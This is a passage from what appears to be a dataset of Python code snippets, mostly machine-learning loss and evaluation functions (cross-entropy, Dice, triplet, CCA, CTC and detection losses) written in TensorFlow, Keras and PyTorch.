basic_ctc_loss(inputs, output) * factor\n\n\t\t\t\tget_ctc_loss = loss_scale\n\t\t\telse:\n\t\t\t\tget_ctc_loss = basic_ctc_loss\n\n\t\t\treturn [\n\t\t\t\t[\n\t\t\t\t\t(flattened_labels if 'warp' in self.variant \\\n\t\t\t\t\t\telse self.output, transcript),\n\t\t\t\t\t(self.input_length if self.relative_to is None \\\n\t\t\t\t\t\telse ctc_scaled, utterance_length),\n\t\t\t\t\t(self.output_length, transcript_length)\n\t\t\t\t],\n\t\t\t\tget_ctc_loss\n\t\t\t]\n\n\t\telse:\n\t\t\traise ValueError('Unsupported backend \"{}\" for loss function \"{}\"'\n\t\t\t\t.format(backend.get_name(), self.get_name()))", "def mcc(y_true, y_pred):\n \n tp = true_positive(y_true, y_pred)\n tn = true_negative(y_true, y_pred)\n fp = false_positive(y_true, y_pred)\n fn = false_negative(y_true, y_pred)\n numerator = (tp * tn) - (fp * fn)\n denominator = (\n (tp + fp) *\n (fn + tn) *\n (fp + tn) *\n (tp + fn)\n )\n \n denominator = denominator ** 0.5\n return numerator/denominator", "def _calc_loss(self, p_act_output:torch.Tensor, p_pred_output:torch.Tensor) -> float:\r\n\r\n return self._loss_fct(p_act_output, p_pred_output)", "def bce_loss(pred, 
label, weights=None):\n row_pred, column_pred = pred\n row_label, column_label = label\n\n criterion = torch.nn.BCELoss(torch.tensor([10.])).cuda()\n\n lr3 = criterion(row_pred[0].view(-1), row_label.view(-1))\n\n lc3 = criterion(column_pred[0].view(-1), column_label.view(-1))\n\n loss = lr3 + lc3\n\n return loss", "def clus_acc(ypred, y):\n assert len(y) > 0\n assert len(np.unique(ypred)) == len(np.unique(y))\n \n s = np.unique(ypred)\n t = np.unique(y)\n \n N = len(np.unique(ypred))\n C = np.zeros((N, N), dtype = np.int32)\n for i in range(N):\n for j in range(N):\n idx = np.logical_and(ypred == s[i], y == t[j])\n C[i][j] = np.count_nonzero(idx)\n \n # convert the C matrix to the 'true' cost\n Cmax = np.amax(C)\n C = Cmax - C\n # \n indices = linear_assignment(C)\n row = indices[:][:, 0]\n col = indices[:][:, 1]\n # calculating the accuracy according to the optimal assignment\n count = 0\n for i in range(N):\n idx = np.logical_and(ypred == s[row[i]], y == t[col[i]] )\n count += np.count_nonzero(idx)\n \n return 1.0*count/len(y)", "def compute_loss(self):", "def loss(data, y_pred):\n # TODO: Try using points other than the training data points for the divergence calculation.\n y_true = data[:,:2]\n p1 = data[:,2:5]\n p2 = data[:,5:8]\n p3 = data[:,8:11]\n p4 = data[:,11:14]\n\n ### Calculate divergence using model predictions:\n\n # Step 1: Use the model to calculate predicted wind field in the surrounding points p1, p2, p3 and p4.\n y_pred_p1 = model(p1)\n y_pred_p2 = model(p2)\n y_pred_p3 = model(p3)\n y_pred_p4 = model(p4)\n\n # Step 2: Calculate the partial derivatives with a three-point centered difference.\n scale_x = self.scaler_data.scale_[0] #scale-factor for x\n scale_y = self.scaler_data.scale_[1] #scale-factor for y\n\n dudx = (y_pred_p1[:, 0] - y_pred_p3[:, 0]) / (p1[:,0] - p3[:,0]) # <- pj = transformed data\n dvdy = (y_pred_p2[:, 1] - y_pred_p4[:, 1]) / (p2[:,1] - p4[:,1]) # <- pj = transformed data\n\n # Step 3: Calculate the divergence.\n divergence = ( dudx / scale_x + dvdy / scale_y ) * np.mean([scale_x, scale_y])\n #tf.print(K.mean(K.abs(divergence)))\n\n # Step 4: Calculate and return total loss.\n return K.mean(K.square(y_true - y_pred)) + gamma*K.mean(K.square(divergence))", "def loss_sce(y_pred, y_true):\n loss = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=y_true, logits=y_pred)\n\n return tf.reduce_mean(loss)", "def loss(self, log_prob, C):\n W = self.W\n T = self.T\n average_log_loss = -C * log_prob\n W_norm = torch.sum(torch.tensor([(torch.norm(Wy.double())) ** 2 for Wy in W])) / 2\n T_norm = torch.sum(torch.tensor([torch.sum(torch.tensor([Tij ** 2 for Tij in row])) for row in T])) / 2\n loss = average_log_loss + W_norm + T_norm\n return loss", "def calc_loss(predictions, labels):\n return np.mean(np.square(predictions - labels))", "def evaluate_loss(\n model,\n ds,\n loss_func_name = 'CE'\n):\n loss = 0\n if loss_func_name == 'CE':\n loss_func = tf.keras.losses.SparseCategoricalCrossentropy(\n reduction=tf.keras.losses.Reduction.SUM\n )\n else:\n raise ValueError(f'Not supported loss function {loss_func_name}!')\n n = 0\n for batch_x, batch_y in ds:\n batch_output = get_model_output(model, batch_x)\n loss += loss_func(batch_y, batch_output)\n n += batch_y.shape[0]\n return loss / n", "def calc_cost(self):\n \n correct_pred = tf.equal(self.predictions, tf.argmax(self.y,1))\n batchaccuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32)) \n return self.cost, batchaccuracy, self.predictions", "def cca_loss(outdim_size, use_all_singular_values):\n def 
inner_cca_objective(y_true, y_pred):\n \"\"\"\n It is the loss function of CCA as introduced in the original paper. There can be other formulations.\n It is implemented by Theano tensor operations, and does not work on Tensorflow backend\n y_true is just ignored\n \"\"\"\n\n r1 = 1e-4\n r2 = 1e-4\n eps = 1e-12\n o1 = o2 = y_pred.shape[1]//2\n\n # unpack (separate) the output of networks for view 1 and view 2\n H1 = tf.transpose(y_pred[:, 0:o1])\n H2 = tf.transpose(y_pred[:, o1:o1+o2])\n\n m = H1.shape[1]\n\n H1bar = H1 - (tf.math.divide(1, m)) * tf.dot(H1, tf.ones([m, m]))\n H2bar = H2 - (tf.math.divide(1, m)) * tf.dot(H2, tf.ones([m, m]))\n\n SigmaHat12 = (tf.math.divide(1, m-1)) * \\\n tf.dot(H1bar, tf.transpose(H2bar))\n SigmaHat11 = (tf.math.divide(1, m-1)) * tf.dot(H1bar,\n tf.transpose(H1bar)) + r1 * tf.eye(o1)\n SigmaHat22 = (tf.math.divide(1, m-1)) * tf.dot(H2bar,\n tf.transpose(H2bar)) + r2 * tf.eye(o2)\n\n # Calculating the root inverse of covariance matrices by using eigen decomposition\n [D1, V1] = tf.nlinalg.eigh(SigmaHat11)\n [D2, V2] = tf.nlinalg.eigh(SigmaHat22)\n\n # Added to increase stability\n posInd1 = tf.gt(D1, eps).nonzero()[0]\n D1 = D1[posInd1]\n V1 = V1[:, posInd1]\n posInd2 = tf.gt(D2, eps).nonzero()[0]\n D2 = D2[posInd2]\n V2 = V2[:, posInd2]\n\n SigmaHat11RootInv = tf.dot(\n tf.dot(V1, tf.nlinalg.diag(D1 ** -0.5)), tf.transpose(V1))\n SigmaHat22RootInv = tf.dot(\n tf.dot(V2, tf.nlinalg.diag(D2 ** -0.5)), tf.transpose(V2))\n\n Tval = tf.dot(tf.dot(SigmaHat11RootInv, SigmaHat12), SigmaHat22RootInv)\n\n if use_all_singular_values:\n # all singular values are used to calculate the correlation\n corr = tf.sqrt(tf.nlinalg.trace(tf.dot(tf.transpose(Tval), Tval)))\n else:\n # just the top outdim_size singular values are used\n [U, V] = tf.nlinalg.eigh(T.dot(tf.transpose(Tval), Tval))\n U = U[tf.gt(U, eps).nonzero()[0]]\n U = U.sort()\n corr = tf.sum(tf.sqrt(U[0:outdim_size]))\n\n return -corr\n\n return inner_cca_objective", "def rpn_cls_loss(*args):\n y_true, y_pred = args if len(args) == 2 else args[0]\n indices = tf.where(tf.not_equal(y_true, -1))\n target = tf.gather_nd(y_true, indices)\n output = tf.gather_nd(y_pred, indices)\n lf = tf.losses.BinaryCrossentropy()\n return lf(target, output)", "def calculate_loss(model, t, logits, labels):\n model_para = model.get_paramaters_list_reshape()\n myTF.calculate_para_dependence_loss(model_para,t)\n\n myTF.calculate_cross_entropy_loss(logits, labels)\n\n return tf.add_n(tf.get_collection('losses'), name='loss_total')", "def compute_objectives(self, predictions, batch, stage):\n _, lens = batch.sig\n emoid, _ = batch.emo_encoded\n\n # Concatenate labels (due to data augmentation)\n if stage == sb.Stage.TRAIN:\n\n if hasattr(self.hparams.lr_annealing, \"on_batch_end\"):\n self.hparams.lr_annealing.on_batch_end(self.optimizer)\n\n loss = self.hparams.compute_cost(predictions, emoid, lens)\n\n if stage != sb.Stage.TRAIN:\n self.error_metrics.append(batch.id, predictions, emoid, lens)\n\n return loss", "def loss(self, prediction_dict, gt_boxes_list, gt_labels_list):\n with tf.name_scope(None, 'Loss', prediction_dict.values()):\n (batch_cls_targets, batch_cls_weights, batch_reg_targets, batch_reg_weights,\n match_list) = self._assign_targets(gt_boxes_list, gt_labels_list)\n # num_positives = [tf.reduce_sum(tf.cast(tf.not_equal(matches.match_results, -1), tf.float32))\n # for matches in match_list]\n self._summarize_target_assignment(gt_boxes_list, match_list)\n reg_loss = regression_loss(prediction_dict[\"box_pred\"], 
batch_reg_targets, batch_reg_weights)\n cls_loss = focal_loss(prediction_dict[\"cls_pred\"], batch_cls_targets, batch_cls_weights)\n # normalize loss by num of matches\n # num_pos_anchors = [tf.reduce_sum(tf.cast(tf.not_equal(match.match_results, -1), tf.float32))\n # for match in match_list]\n normalizer = tf.maximum(tf.to_float(tf.reduce_sum(batch_reg_weights)), 1.0)\n # normalize reg loss by box codesize (here is 4)\n reg_normalizer = normalizer * 4\n normalized_reg_loss = tf.multiply(reg_loss, 1.0/reg_normalizer, name=\"regression_loss\")\n normalized_cls_loss = tf.multiply(cls_loss, 1.0/normalizer, name=\"classification_loss\")\n return normalized_reg_loss, normalized_cls_loss, batch_reg_weights, batch_cls_weights", "def _get_cost(self):\n logging.info(\"Cost: {}\".format(self.cost_function.name))\n\n with tf.name_scope(\"cost\"):\n\n if self.cost_function == Cost.BATCH_DICE_LOG or self.cost_function == Cost.BATCH_DICE_SOFT or \\\n self.cost_function == Cost.BATCH_DICE_SOFT_CE:\n # calculate Dice loss over the complete batch (take batch as pseudo 3d Tensor)\n if self._n_class == 1:\n # if nr classes is 1 axis 3 has only one component\n axis = (0, 1, 2, 3)\n else:\n axis = (0, 1, 2)\n else:\n # compute dice for each slice and take average (normally not used but considered as option)\n if self._n_class == 1:\n axis = (1, 2, 3)\n else:\n axis = (1, 2)\n # flatten input and outpout\n flat_logits = tf.reshape(self.logits, [-1, self._n_class])\n flat_labels = tf.reshape(self.y, [-1, self._n_class])\n\n # cross entropy loss\n if self.cost_function == Cost.CROSS_ENTROPY:\n # if class weights are None cross entropy will not be weighted\n loss = tfu.get_cross_entropy(logits=flat_logits, y=flat_labels, n_class=self._n_class,\n weights=self._class_weights_ce)\n # Dice loss\n elif self.cost_function == Cost.DICE_SOFT or self.cost_function == Cost.BATCH_DICE_SOFT:\n loss = 1.0 - tfu.get_dice_loss(logits=self.logits, y=self.y, axis=axis,\n weights=self._class_weights_dice, exclude_zero_label=False)\n # Weighted combination of dice and cross entropy\n elif self.cost_function == Cost.DICE_SOFT_CE or self.cost_function == Cost.BATCH_DICE_SOFT_CE:\n loss = self._loss_weight * (1.0 - tfu.get_dice_loss(logits=self.logits, y=self.y, axis=axis,\n weights=self._class_weights_dice,\n exclude_zero_label=False))\n loss += (1.0 - self._loss_weight) * tfu.get_cross_entropy(logits=flat_logits, y=flat_labels,\n n_class=self._n_class,\n weights=self._class_weights_ce)\n # Dice log loss (-log(dice_score)). Considered to have nicer gradient.\n # But seems to be not realy more valuable in real life\n elif self.cost_function == Cost.DICE_LOG or self.cost_function == Cost.BATCH_DICE_LOG:\n loss = tfu.get_dice_log_loss(self.logits, self.y, axis=axis, exclude_zero_label=False)\n\n # MSE loss used for regression tasks\n elif self.cost_function == Cost.MSE:\n loss = tf.losses.mean_squared_error(flat_logits, flat_labels)\n\n # TV loss (MSE + total variation of output as regularizer). 
Seems to not work very\n elif self.cost_function == Cost.TV:\n loss = tf.losses.mean_squared_error(flat_logits, flat_labels)\n tv = tf.reduce_sum(tf.image.total_variation(self.logits))\n loss += self._tv_regularizer * tv\n else:\n raise ValueError(\"Unknown cost function: \" % self.cost_function.name)\n\n # if value for l1 or l2 regularizer is given add them to the loss\n if self._l2_regularizer is not None:\n self.l2regularizers = self._l2_regularizer * sum(\n [tf.nn.l2_loss(variable) for variable in self.variables])\n loss += self.l2regularizers\n if self._l1_regularizer is not None:\n self.l1regularizers = self._l1_regularizer * sum([\n tf.reduce_sum(tf.abs(variable)) for variable in self.variables])\n loss += self.l1regularizers\n\n return loss", "def cnn_pred(self):\n \n # Construct model\n pred = self.conv_net()\n \n # Evaluate model\n correct_pred = tf.equal(tf.argmax(pred, 1), tf.argmax(self.y, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n \n return (pred, correct_pred, accuracy)", "def _classification_loss(self, logits, labels, num_classes):\n labels = tf.to_int64(labels)\n onehot_labels = tf.one_hot(labels, num_classes)\n with tf.name_scope('finetuning_loss'):\n cross_entropy = tf.losses.softmax_cross_entropy(\n onehot_labels=onehot_labels, logits=logits)\n cross_entropy = tf.reduce_mean(cross_entropy)\n regularization = tf.reduce_sum(\n tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES))\n loss = cross_entropy + self.weight_decay * regularization\n return loss", "def add_loss_op(self, pred):\n ### YOUR CODE HERE\n loss = cross_entropy_loss(self.labels_placeholder,pred)\n ### END YOUR CODE\n return loss", "def CE():\n def CE_loss(input,target):\n return nn.CrossEntropyLoss()(input.squeeze(), target)\n\n return CE_loss", "def loss(self, prediction_dict, preprocessed_dict, epsilon=1e-12):\r\n gt_images = preprocessed_dict.get('images')\r\n gt_fg = preprocessed_dict.get('images_fg')\r\n gt_bg = preprocessed_dict.get('images_bg')\r\n gt_alpha_matte = preprocessed_dict.get('alpha_mattes')\r\n gt_trimaps = preprocessed_dict.get('trimaps')\r\n\r\n pred_trimaps = prediction_dict.get('pred_trimap')\r\n alpha_matte_r = prediction_dict.get('alpha_matte_r')\r\n alpha_matte_p = prediction_dict.get('alpha_matte_p')\r\n background = prediction_dict.get('background')\r\n foreground = prediction_dict.get('foreground')\r\n\r\n pred_images = tf.multiply(alpha_matte_p, gt_fg) + tf.multiply(1 - alpha_matte_p, gt_bg)\r\n\r\n # weights = tf.where(tf.equal(pred_trimaps, 128),\r\n # tf.ones_like(pred_trimaps),\r\n # tf.zeros_like(pred_trimaps))\r\n # total_weights = tf.reduce_sum(weights) + epsilon\r\n\r\n # trimap_losses = tf.sqrt(tf.square(pred_trimaps - gt_trimaps) + epsilon)\r\n # trimap_losses = tf.reduce_mean(trimap_losses)\r\n\r\n trimap_losses = tf.losses.softmax_cross_entropy(\r\n tf.concat([gt_alpha_matte, 1 - gt_alpha_matte], axis=3),\r\n tf.concat([foreground, background], axis=3))\r\n alpha_losses = tf.sqrt(tf.square(alpha_matte_p - gt_alpha_matte) + epsilon)\r\n alpha_losses = tf.reduce_mean(alpha_losses)\r\n\r\n composition_losses = tf.sqrt(tf.square(pred_images / 255. - gt_images / 255.) 
+ epsilon)\r\n composition_losses = tf.reduce_mean(composition_losses)\r\n\r\n loss = (self._alpha_loss_weight * alpha_losses +\r\n self._first_stage_image_loss_weight * composition_losses +\r\n self._trimap_loss_weight * trimap_losses)\r\n loss_dict = {'trimap_losses': trimap_losses,\r\n 'alpha_losses': alpha_losses,\r\n 'composition_losses': composition_losses,\r\n 'loss': loss}\r\n return loss_dict", "def pseudo_loss(self, params, batches):\n loss = 0\n for batch in batches:\n states = batch[\"states\"]\n actions = batch[\"actions\"]\n returns = batch[\"returns\"]\n\n preds = self.predict_jax(params, states)\n\n baseline = jnp.mean(returns, axis=0)\n preds_select = jnp.take_along_axis(preds, jnp.expand_dims(actions, axis=2), axis=2).squeeze()\n loss += (-jnp.mean(jnp.sum(preds_select * (returns - baseline))))\n\n return loss + self.l2_regularizer(params, 0.001) # try to divide by len(batches)?", "def get_loss(self, criterion, target, preds, epoch=0):\n assert isinstance(target, dict)\n assert isinstance(preds, dict)\n assert isinstance(criterion, dict)\n\n loss = {\"total\": 0, \"all_class\": 0}\n\n for key in target[\"class\"].keys():\n labels = target[\"class\"][key]\n batch_size = target[\"class\"][key].shape[0]\n loss[key] = criterion[\"crossentropy\"](preds[key], labels)\n loss[\"all_class\"] += loss[key]\n\n loss[\"total\"] += loss[\"all_class\"]\n\n if self.use_attention and not self.cfg.model.attention.use_fixed:\n if self.training and epoch + 1 < self.cfg.model.attention.decay_step:\n prior_multiplier = 0\n contrast_multiplier = 0\n entropy_multiplier = 0\n else:\n prior_multiplier = self.cfg.model.attention.wt_decay\n contrast_multiplier = self.cfg.model.attention.contrast_decay\n entropy_multiplier = self.cfg.model.attention.entropy_decay\n\n wts = preds[\"weights\"].squeeze(1)\n\n if self.cfg.model.attention.use_prior:\n b, n, _, _ = target[\"weights\"].shape\n assert wts.shape[0] == b * n\n prior = target[\"weights\"].reshape(b * n, -1)\n if self.cfg.model.attention.wt_loss == \"kl\":\n wts = torch.log(wts + 1e-7)\n loss[\"prior\"] = criterion[\"prior\"](wts, prior)\n loss[\"total\"] += prior_multiplier * loss[\"prior\"]\n if self.cfg.model.attention.use_contrast:\n loss[\"contrast\"] = criterion[\"contrast\"](wts)\n loss[\"total\"] += contrast_multiplier * loss[\"contrast\"]\n if self.cfg.model.attention.use_entropy:\n loss[\"entropy\"] = Categorical(probs=wts + 1e-6).entropy().mean()\n # if the loss minimization goes below threshold, stop training with entropy loss\n if (\n self.training\n and entropy_multiplier > 0\n and loss[\"entropy\"] < self.cfg.model.attention.entropy_thresh\n ):\n entropy_multiplier = 0\n loss[\"total\"] += entropy_multiplier * loss[\"entropy\"]\n\n return loss, batch_size", "def loss_total(self):\r\n def loss(y_true, y_pred):\r\n l2 = 1/2*K.sum(K.square(y_true-y_pred))\r\n\r\n return l2\r\n return loss", "def compute_class_loss(y_true, raw_prediction, object_mask, batch_size):\n true_class_probabilities = y_true[..., 5:]\n predicted_class_probabilities = raw_prediction[..., 5:]\n\n cross_entropy = K.binary_crossentropy(target=true_class_probabilities, output=predicted_class_probabilities,\n from_logits=True)\n class_loss = object_mask * cross_entropy\n class_loss = K.sum(class_loss) / batch_size\n return class_loss", "def classification_loss(self, logit, target):\n return F.cross_entropy(logit, target)", "def compute_loss(self):\n self.prototypes = self.compute_prototypes()\n self.test_logits = self.compute_logits()\n loss = 
tf.nn.sparse_softmax_cross_entropy_with_logits(\n labels=self.episode.test_labels, logits=self.test_logits)\n cross_entropy_loss = tf.reduce_mean(loss)\n regularization = tf.reduce_sum(\n tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES))\n loss = cross_entropy_loss + self.weight_decay * regularization\n return loss", "def reconstruction_loss(x, t_decoded):\r\n return K.sum((K.batch_flatten(x) - K.batch_flatten(t_decoded)) ** 2,\r\n axis=-1)", "def loss_perceptual(self, vgg_out, vgg_gt, vgg_comp): \n loss = 0\n for o, c, g in zip(vgg_out, vgg_comp, vgg_gt):\n loss += self.l1(o, g) + self.l1(c, g)\n return loss", "def compute_loss(self, batch, y_next_true):\n\n # Get the output of the gru layer for the input which serves as input to the reconstruction + forecasting model\n gru_output = self.model(batch, training=True)\n\n # Forecasting model loss calculation\n # Using mse yields the same result as RMSE and is more stable\n y_next_pred = self.model.forecasting_model(gru_output, training=True)\n y_next_pred = y_next_pred[:, -1, :] # only get the prediction for the last timestamp\n\n mse_for = tf.keras.losses.MeanSquaredError()\n loss_for = mse_for(y_next_true, y_next_pred)\n\n # Reconstruction model loss calculation\n # Like VAE based on: https://bit.ly/3oRMiQz\n mse_rec = tf.keras.losses.MeanSquaredError()\n reconstructed_output = self.model.reconstruction_model(gru_output)\n reconstruction_target = gru_output if 'reconstruct_gru' in self.hyper.variants else batch\n\n loss_rec = mse_rec(reconstruction_target, reconstructed_output)\n loss_rec += sum(self.model.reconstruction_model.losses) # Add KLD regularization loss\n\n # Overall loss\n loss = loss_for + loss_rec\n\n return loss", "def crossentropy_max_core(y_true, y_pred):\n\n # hyper param\n print(_m)\n y_pred = K.clip(y_pred, K.epsilon(), 1)\n\n # compute loss for every data point\n _loss = -K.sum(y_true * K.log(y_pred), axis=-1)\n\n # threshold\n t_m = K.max(_loss) * _m\n _mask_m = 1 - (K.cast(K.greater(_loss, t_m), 'float32'))\n _loss = _loss * _mask_m\n\n return _loss", "def _loss(self, preds, labels):\n if self.sigmoid_loss:\n assert preds.shape == labels.shape\n return torch.nn.BCEWithLogitsLoss()(preds, labels) * preds.shape[1]\n else:\n if len(labels.shape) == 2: # flatten to 1D\n labels = torch.max(labels, axis=1)[1] # this can handle both bool and float types\n return torch.nn.CrossEntropyLoss()(preds, labels)", "def loss(self, prediction_dict, groundtruth_lists):\r\n pass", "def charbonnier_loss(y_true, y_pred, y_mask):\n y_shape = tf.shape(y_true)\n border = 3\n max_pixels_shifts = 2*border\n # crop the center of the reconstructed HR image\n size_image = HR_SIZE\n size_croped_image = size_image - max_pixels_shifts\n clear_pixels = size_croped_image*size_croped_image\n cropped_predictions = y_pred[:, border:size_image -\n border, border:size_image-border]\n alpha = 0.45\n beta = 1.0\n epsilon = 0.001\n\n X = []\n for i in range(max_pixels_shifts+1): # range(7)\n for j in range(max_pixels_shifts+1): # range(7)\n cropped_labels = y_true[:, i:i+(size_image-max_pixels_shifts),\n j:j+(size_image-max_pixels_shifts)]\n cropped_y_mask = y_mask[:, i:i+(size_image-max_pixels_shifts),\n j:j+(size_image-max_pixels_shifts)]\n\n cropped_y_mask = tf.cast(cropped_y_mask, tf.float32)\n\n cropped_predictions_masked = cropped_predictions*cropped_y_mask\n cropped_labels_masked = cropped_labels*cropped_y_mask\n\n total_pixels_masked = tf.reduce_sum(cropped_y_mask, axis=[1, 2])\n\n # bias brightness\n b = 
(1.0/total_pixels_masked)*tf.reduce_sum(\n tf.subtract(cropped_labels_masked, cropped_predictions_masked),\n axis=[1, 2])\n\n b = tf.reshape(b, [y_shape[0], 1, 1, 1])\n\n corrected_cropped_predictions = cropped_predictions_masked+b\n corrected_cropped_predictions = corrected_cropped_predictions*cropped_y_mask\n diff = tf.subtract(cropped_labels_masked,\n corrected_cropped_predictions)\n\n error = tf.pow(tf.square(diff * beta) + tf.square(epsilon), alpha)\n error = tf.multiply(cropped_y_mask, error)\n\n X.append(tf.reduce_sum(error) / total_pixels_masked)\n\n X = tf.stack(X)\n # Take the minimum mse\n minim = tf.reduce_min(X, axis=0)\n return minim", "def loss_fn(self, lbl, y):\n\n binlbl = self._to_device(lbl[:,0]>.5)\n # center = self._to_device(lbl[:,3]) \n offset = 5. * self._to_device(lbl[:,1:]) \n\n loss = self.criterion(y[:,:2], offset) \n loss2 = self.criterion2(y[:,2], binlbl)\n\n # loss3 = self.criterion(y[:,3], center)\n\n loss = loss + loss2\n return loss", "def score(y_true, y_pred):\n tf.dtypes.cast(y_true, tf.float32)\n tf.dtypes.cast(y_pred, tf.float32)\n sigma = y_pred[:, 2] - y_pred[:, 0]\n fvc_pred = y_pred[:, 1]\n\n sigma_clip = tf.maximum(sigma, C1)\n # Python is automatically broadcasting y_true with shape (1,0) to\n # shape (3,0) in order to make this subtraction work\n delta = tf.abs(y_true[:, 0] - fvc_pred)\n delta = tf.minimum(delta, C2)\n sq2 = tf.sqrt(tf.dtypes.cast(2, dtype=tf.float32))\n metric = (delta / sigma_clip) * sq2 + tf.math.log(sigma_clip * sq2)\n return K.mean(metric)", "def triplet_loss(y_true, y_pred, alpha=0.5):\n print('y_pred.shape = ', y_pred)\n\n total_lenght = y_pred.shape.as_list()[-1]\n # print('total_lenght=', total_lenght)\n # total_lenght =12\n\n anchor = y_pred[:, 0:int(total_lenght * 1 / 3)]\n positive = y_pred[:, int(total_lenght * 1 / 3):int(total_lenght * 2 / 3)]\n negative = y_pred[:, int(total_lenght * 2 / 3):int(total_lenght * 3 / 3)]\n\n # distance between the anchor and the positive\n pos_dist = K.sum(K.square(anchor - positive), axis=1)\n\n # distance between the anchor and the negative\n neg_dist = K.sum(K.square(anchor - negative), axis=1)\n\n # compute loss\n basic_loss = pos_dist - neg_dist + alpha\n loss = tf.reduce_mean(K.maximum(basic_loss, 0.0))\n\n return loss", "def calc_loss(prediction, target, bce_weight=0.5):\n # prediction = F.softmax(prediction)\n prediction = F.sigmoid(prediction)\n bce = F.binary_cross_entropy(prediction, target)\n \n dice = dice_loss(prediction, target)\n\n loss = bce * bce_weight + dice * (1 - bce_weight)\n\n return loss", "def train_step(self, X_batch: np.ndarray, Y_batch: np.ndarray):\n\n # Almost the same as previous task, calculates the cross entropy loss for multiple classes using the softmax loss equation provided in the assignment.\n targets = Y_batch\n outputs = self.model.forward(X_batch)\n self.model.backward(X_batch, outputs, targets)\n \n self.model.w += -self.learning_rate*self.model.grad\n \n loss = cross_entropy_loss(targets, outputs)\n return loss", "def calculate_loss(self, train_x, train_y):\n self.log.info(\"Calculating average categorical crossentropy loss...\")\n\n num_words = np.sum([len(y) for y in train_y])\n return self.calculate_total_loss(train_x, train_y)/float(num_words)", "def _rpn_loss_cls(y_true, y_pred):\n y_true = y_true[0][0]\n cls_keep = tf.where(tf.not_equal(y_true, -1))[:, 0]\n cls_true = tf.gather(y_true, cls_keep)\n cls_pred = tf.gather(y_pred[0], cls_keep)\n cls_true = tf.cast(cls_true, 'int64')\n loss = 
tf.nn.sparse_softmax_cross_entropy_with_logits(labels=cls_true, logits=cls_pred)\n return K.switch(tf.size(loss) > 0, K.clip(K.mean(loss), 0, 10), K.constant(0.0))", "def triplet_loss(y_true, y_pred, alpha = 0.2):\r\n \r\n anchor, positive, negative = y_pred[0], y_pred[1], y_pred[2]\r\n \r\n # Step 1: Compute the (encoding) distance between the anchor and the positive, you will need to sum over axis=-1\r\n pos_dist = tf.reduce_sum(tf.square(tf.subtract(anchor, positive)), axis=-1)\r\n # Step 2: Compute the (encoding) distance between the anchor and the negative, you will need to sum over axis=-1\r\n neg_dist = tf.reduce_sum(tf.square(tf.subtract(anchor, negative)), axis=-1)\r\n # Step 3: subtract the two previous distances and add alpha.\r\n basic_loss = tf.add(tf.subtract(pos_dist, neg_dist), alpha)\r\n # Step 4: Take the maximum of basic_loss and 0.0. Sum over the training examples.\r\n loss = tf.reduce_sum(tf.maximum(basic_loss, 0))\r\n # END CODE HERE \r\n \r\n return loss", "def compute_loss(darknet_output, ground_truth):\n darknet_output = tf.reshape(darknet_output, [-1, 13, 13, 5, 85])\n net_raw_xy = darknet_output[..., :2]\n net_raw_hw = darknet_output[..., 2:4]\n net_raw_conf = darknet_output[..., 4:5]\n net_raw_prob = darknet_output[..., 5:]\n\n\n prediction = output_to_prediction(darknet_output)\n prediction = tf.reshape(prediction, [-1, 13, 13, 5, 85])\n\n # the factor used to calculate the object weight\n obj_scale = 5\n\n # the factor used to calculate the no object weight\n no_obj_scale = 1\n\n # the factor used to calculate the class prediction loss\n class_scale = 1\n\n # the factor factor used to calculate the coordinate loss\n coordinates_scale = 1\n\n # decode the prediction, convert all values to the 13x13 feature map\n pred_xy_offset = prediction[..., :2]\n pred_hw_ratio = prediction[..., 2:4]\n pred_conf = prediction[..., 4:5]\n pred_class = prediction[..., 5:]\n\n # decode the ground truth, convert all values to the 13x13 feature map\n gt_xy_offset = ground_truth[..., :2]\n gt_hw_ratio = ground_truth[..., 2:4]\n gt_conf = ground_truth[..., 4:5]\n gt_class = ground_truth[..., 5:]\n\n # 13 x 13 x 2 tensor, used to compute the x and y in the 13 x 13 feature map\n biases = tf.Variable([[[j * 1.0, i * 1.0] for i in range(13)] for j in range(13)])\n biases = tf.reshape(biases, [1, 13, 13, 1, 2])\n\n box_priors = tf.Variable([[0.57273, 0.677385], [1.87446, 2.06253], [3.33843, 5.47434], [7.88282, 3.52778], [9.77052, 9.16828]])\n box_priors = tf.reshape(box_priors, [1, 1, 1, 5, 2])\n\n pred_xy = pred_xy_offset + biases\n pred_hw = pred_hw_ratio * box_priors\n\n gt_xy = gt_xy_offset + biases\n gt_hw = gt_hw_ratio * box_priors\n\n # calculate the top-left and bottom-right point of the predicted box\n pred_xy_min, pred_xy_max = pred_xy - pred_hw / 2.0, pred_xy + pred_hw / 2.0\n\n gt_xy_min, gt_xy_max = gt_xy - gt_hw / 2.0, gt_xy + gt_hw / 2.0\n\n intersection_min = tf.maximum(gt_xy_min, pred_xy_min)\n intersection_max = tf.minimum(gt_xy_max, pred_xy_max)\n intersection_hw = tf.maximum(intersection_max - intersection_min, 0.0)\n\n # calculate the intersection area and the union area of the prediction and the ground truth\n intersection_area = tf.multiply(intersection_hw[..., 0], intersection_hw[..., 1])\n union_area = tf.multiply(gt_hw[..., 0], gt_hw[..., 1]) + tf.multiply(pred_hw[..., 0],\n pred_hw[..., 1]) - intersection_area\n # shape of iou: (?, 13, 13, 5)\n box_iou = intersection_area / union_area\n\n obj = gt_conf\n\n gt_raw_hw = tf.log(gt_hw_ratio)\n\n gt_raw_hw = 
tf.where(tf.is_inf(gt_raw_hw), tf.zeros_like(gt_raw_hw), gt_raw_hw)\n\n # ======================================================================================\n\n coords_xy_loss = tf.nn.sigmoid_cross_entropy_with_logits(logits=net_raw_xy, labels=gt_xy_offset) * obj * coordinates_scale\n coords_xy_loss = tf.reduce_sum(coords_xy_loss)\n\n coords_wh_loss = tf.square(net_raw_hw - gt_raw_hw) * 0.5 * obj * coordinates_scale\n\n coords_wh_loss = tf.reduce_sum(coords_wh_loss)\n\n coords_loss = coords_xy_loss + coords_wh_loss\n\n ignore_thresh = 0.5\n\n ignore_mask = tf.cast(tf.less(box_iou, ignore_thresh * tf.ones_like(box_iou)), tf.float32)\n ignore_mask = tf.reshape(ignore_mask, [-1, 13, 13, 5])\n ignore_mask = tf.expand_dims(ignore_mask, -1)\n\n back_loss = ((1 - obj) * tf.nn.sigmoid_cross_entropy_with_logits(logits=net_raw_conf, labels=obj) * ignore_mask)\n back_loss = tf.reduce_sum(back_loss)\n\n fore_loss = obj * tf.nn.sigmoid_cross_entropy_with_logits(logits=net_raw_conf, labels=obj)\n\n fore_loss = 